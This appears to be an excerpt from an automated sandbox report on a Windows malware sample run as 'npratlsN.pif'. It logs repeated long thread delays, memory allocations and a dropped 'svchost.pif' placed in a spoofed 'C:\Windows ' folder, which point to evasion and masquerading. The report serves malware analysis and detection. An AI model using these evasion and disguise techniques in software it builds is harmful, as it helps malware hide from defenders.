Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\Public\Libraries\npratlsN.pif	Memory allocated: 1C720000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Memory allocated: 1CB70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Memory allocated: 1C8D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Memory allocated: 2D3C0000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\npratlsN.pif	Memory allocated: 2D8E0000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\npratlsN.pif	Memory allocated: 2D7E0000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\npratlsN.pif	Memory allocated: 28210000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\npratlsN.pif	Memory allocated: 28400000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\npratlsN.pif	Memory allocated: 2A400000 memory reserve \| memory write watch

Source: C:\Users\Public\Libraries\npratlsN.pif

13_2_004019F0

Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599758	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599638	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599500	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599374	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599265	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599156	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599046	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598937	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598821	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598154	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597390	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597279	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597062	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596515	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596294	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596187	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595640	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595200	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595087	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594869	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594665	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594546	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594436	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594328	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594218	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599880
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599766
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599641
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599516
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599406
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599297
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599188
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599063
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598938
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598828
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598608
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598490
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598365
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598232
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598121
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598000
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597883
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597776
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597659
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597524
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597410
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597270
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597020
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596368
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596223
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596073
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595841
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595711
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595598
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595464
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595314
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595171
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595058
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594947
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594833
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594705
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594580
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594470
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594330
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593808
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593690
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593565
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593455
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593315
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593190
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593065
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592940
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592815
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592699
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592596
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592455
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592330
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592205
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592096
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591955
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591846
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591721
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591596
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591471
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591346
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591221
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591096
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 590971
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599891
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599782
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599657
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599532
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599407
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599282
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599157
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599047
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598938
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598813
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598688
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598563
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598438
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598328
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598219
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598094
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597985
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597860
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597735
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597610
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597485
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597360
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597235
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597110
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596985
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596860
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596735
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596610
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596485
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596360
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596235
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596110
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595985
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595860
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595735
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595610
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595485
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595360
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595235
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595110
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594985
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594860
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594735
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594610
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594485
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594360
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594235
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594110
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593985

Source: C:\Users\Public\Libraries\npratlsN.pif	Window / User API: threadDelayed 9520	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Window / User API: threadDelayed 2838
Source: C:\Users\Public\Libraries\npratlsN.pif	Window / User API: threadDelayed 6908
Source: C:\Users\Public\Libraries\npratlsN.pif	Window / User API: threadDelayed 1556
Source: C:\Users\Public\Libraries\npratlsN.pif	Window / User API: threadDelayed 8248

Source: C:\Windows\SysWOW64\brightness.exe

Dropped PE file which has not been started: C:\Windows \SysWOW64\svchost.pif

Jump to dropped file

Source: C:\Users\Public\Libraries\Nsltarpn.PIF

API coverage: 9.8 %

Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7920	Thread sleep count: 321 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7920	Thread sleep count: 9520 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -599758s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -599638s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -599500s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -599374s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -599265s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -599156s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -599046s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -598937s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -598821s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -598719s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -598594s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -598484s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -598375s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -598265s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -598154s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -598047s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -597937s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -597828s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -597609s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -597500s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -597390s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -597279s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -597172s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -597062s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -596953s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -596844s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -596734s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -596625s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -596515s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -596406s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -596294s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -596187s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -596078s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -595969s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -595859s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -595750s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -595640s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -595531s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -595422s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -595312s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -595200s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -595087s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -594984s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -594869s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -594665s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -594546s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -594436s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -594328s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7916	Thread sleep time: -594218s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep count: 34 > 30
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8132	Thread sleep count: 2838 > 30
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -599880s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8132	Thread sleep count: 6908 > 30
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -599766s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -599641s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -599516s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -599406s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -599297s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -599188s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -599063s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -598938s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -598828s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -598608s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -598490s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -598365s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -598232s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -598121s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -598000s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -597883s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -597776s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -597659s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -597524s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -597410s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -597270s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -597020s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -596368s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -596223s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -596073s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -595841s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -595711s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -595598s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -595464s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -595314s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -595171s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -595058s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -594947s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -594833s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -594705s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -594580s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -594470s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -594330s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -593808s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -593690s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -593565s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -593455s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -593315s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -593190s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -593065s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -592940s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -592815s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -592699s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -592596s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -592455s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -592330s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -592205s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -592096s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -591955s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -591846s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -591721s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -591596s >= -30000s
